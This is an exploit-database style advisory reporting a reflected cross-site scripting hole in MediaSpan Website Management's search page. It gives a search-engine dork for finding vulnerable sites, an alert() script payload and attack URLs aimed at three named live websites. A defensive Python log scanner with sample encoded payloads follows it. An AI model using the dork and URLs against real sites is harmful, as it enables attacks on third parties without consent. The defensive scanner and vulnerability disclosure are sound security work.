MediaSpan Website Management Cross Site Scripting

2012-07-04 08:23:22
Submitted by: Crim3R

# Exploit Title: MediaSpan Website Management Cross Site Scripting

# Google Dork: intext: Copyright © 2012 CUMULUS MEDIA and MediaSpan

# Date: 7/03/2012

# Author: Crim3R

# software Link : http://www.mediaspanonline.com/products/websitemanagement/

# Version: All :)

# Tested on: all



========================================
There is an XSS in searchresults.asp.
Go to the search page and put this (or any HTML code) in the search form:
<script>alert(1);</script>

========================================

Demo sites:

http://khop.com/searchresults.asp?search=1&LOOKFOR=&searchFor=<script>alert(1);</script>++&keyword=<script>alert(1);</script>++


http://www.993kjoy.com/searchresults.asp?search=1&LOOKFOR=&searchFor=<script>alert(1);</script>++&keyword=<script>alert(1);</script>++


http://www.wabcradio.com/searchresults.asp?search=1&LOOKFOR=&searchFor=<script>alert(1);</script>++&keyword=<script>alert(1);</script>++


===============Crim3R=====================

sites :

http://irist.ir/forum/
http://security7.ir/sc/


thanks to : Amir - 2MzRp - Skote_vahshat-

and all IrIsT security7 Members ...
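
A defender-side check for the issue described above, as an added example that is not part of the original advisory: it scans web-server log lines for requests to searchresults.asp whose searchFor or keyword parameter carries HTML markup after decoding. The log layout, the sample lines and all function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

PAGE = "/searchresults.asp"            # script named in the advisory
WATCHED = {"searchfor", "keyword"}     # parameters seen in the demo URLs
# Markup indicators: tag opener, inline event handler, javascript: URI
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def flagged_params(stem, query):
    """Names of watched parameters whose decoded value contains markup."""
    if stem.lower() != PAGE:
        return []
    hits = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in WATCHED and MARKUP.search(fully_decode(value)):
            hits.add(name)
    return sorted(hits)

def scan(lines):
    """Yield (client_ip, flagged parameter names) for each suspicious request."""
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:   # directive or short line
            continue
        stem, query, client = fields[3], fields[4], fields[5]
        hits = flagged_params(stem, query)
        if hits:
            yield client, hits

# Constructed sample lines (assumed layout: date time method stem query client-ip status)
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2012-07-05 10:00:01 GET /searchresults.asp search=1&LOOKFOR=&searchFor=morning+show&keyword=morning+show 203.0.113.10 200",
    "2012-07-05 10:00:07 GET /searchresults.asp search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&keyword=news 203.0.113.44 200",
    "2012-07-05 10:00:09 GET /searchresults.asp search=1&keyword=%253Cb%253Ebold 203.0.113.45 200",
    "2012-07-05 10:00:12 GET /default.asp q=%3Cb%3E 203.0.113.46 200",
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

Hits from this scan show which clients sent markup to the search page; they do not by themselves show whether the response echoed it unencoded.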

Fixes

No fixes
